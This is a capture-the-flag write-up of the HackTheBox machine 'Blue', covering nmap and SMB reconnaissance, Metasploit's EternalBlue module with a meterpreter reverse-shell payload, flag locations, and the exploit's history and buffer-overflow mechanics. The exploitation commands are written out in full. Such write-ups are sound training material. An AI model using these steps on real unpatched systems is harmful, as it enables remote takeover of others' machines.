tools & techniques
Other

Blue

Known as the easiest machine on HackTheBox - Blue should not be overlooked. It shows how damaging not patching can be, and how quickly attackers can get the highest privilege on a machine in minutes.

Write Up

Setup

First, setup and organize your environment. In my opinion, organization is the most important skill to master. Here is how I always start a new machine:

$ cd hackthebox
$ mkdir blue
$ mkdir blue/nmap blue/www blue/gobuster
$ cd blue

Reconnaissance

The nmap scan following using standard options:

$ nmap -sC -sV 10.10.10.40 -oA nmap/blue
# Nmap 7.91 scan initiated Sun Apr 11 02:47:40 2021 as: nmap -sC -sV -v -oA nmap/blue 10.10.10.40
Nmap scan report for blue.htb (10.10.10.40)
Host is up (0.085s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
​
Host script results:
|_clock-skew: mean: -15m21s, deviation: 34m36s, median: 4m36s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-04-11T07:53:25+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-04-11T06:53:23
|_ start_date: 2021-04-10T20:13:09
​
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 11 02:48:54 2021 -- 1 IP address (1 host up) scanned in 74.51 seconds

We can see from the nmap scan that smb-security-mode allows guest access, lets test that out:

$ smbclient -L blue.htb
Enter SMB2\kali's password:
​
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Share Disk
Users Disk
SMB1 disabled -- no workgroup available

We can connect to both the Users and Share disk using the following commands, however this is unnecessary for the completion of the box:

$ smbclient //blue.htb/Users
$ smbclient //blue.htb/Share

Let's look into the Window's version and see if there is a vulnerability: Googling Windows 7 Professional 7601 Service Pack 1 (which we got from the nmap scan) the first result is an exploit for 'Eternal Blue'.

​Eternal Blue is a fascinating exploit. It was developed by the NSA and leaked by the Shadow Brokers in 2017. Following its release, its had a wild and violent record: it was used in 2017 by WannaCry and NotPetya, both of which had devastating consequences across the world. Read more in the Beyond the Box section →​

Exploitation

Let's find an module we can use in Metasploit:

$ searchsploit eternalblue
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/42030.py

It Metasploit, configure the exploit:

msf6 > use windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST blue.htb
RHOST => blue.htb
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST tun0
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
​
Module options (exploit/windows/smb/ms17_010_eternalblue):
​
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.40 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
​
​
Payload options (windows/x64/meterpreter/reverse_tcp):
​
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
​
​
Exploit target:
​
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
​
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

The exploit might take a couple tries to complete. When you do, you will have a shell with the highest privilege on the machine.

The user flag is at C:\Users\haris\user.txt. The root flag is at C:\Users\Administrators\root.txt.

Beyond the Box

History

Eternal Blue — officially name MS17-010 by Microsoft — is as exploit created by the National Security Agency which targets Microsoft Server Message Block 1.0 (SMBv1). In severe cases, it allows remote code execution.

The exploit was leaked in 2017 by the Shadow Brokers, a hacker group which emerged the previous year. While the origins of the group remain unknown, they are speculated to be a part of larger Russian campaign.

Following the leak, Eternal Blue was used in both WannaCry and NotPetya cyberattacks in 2017. Both of which had devastating effects across the world — but most notably in the Ukraine. The attack is speculated as a subsequent effect of the 2014 Russian annexation of Crimea .

As a result, Brad Smith, president of Microsoft, wrote in a 2017 blog post titled "The need for urgent collective action to keep people safe online: Lessons from last week’s cyberattack" on the Microsoft website:

We have seen vulnerabilities stored by the CIA show up on WikiLeaks, and now this vulnerability stolen from the NSA has affected customers around the world. Repeatedly, exploits in the hands of governments have leaked into the public domain and caused widespread damage. An equivalent scenario with conventional weapons would be the U.S. military having some of its Tomahawk missiles stolen. And this most recent attack represents a completely unintended but disconcerting link between the two most serious forms of cybersecurity threats in the world today – nation-state action and organized criminal action.

Microsoft released a patch for vulnerable systems on March 14, 2017.

Read the Wikipedia entry here.

The Exploit

We used the Metasploit module exploit/windows/smb/ms17_010_eternalblue the description for that exploit is:

This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers.

There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete.

This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again.

The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead.

On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads.

You can find the source code for the exploit here.

No doubt a complicated exploit which required many hours of research comes down to one of the most fundamental exploit techniques: a buffer overflow.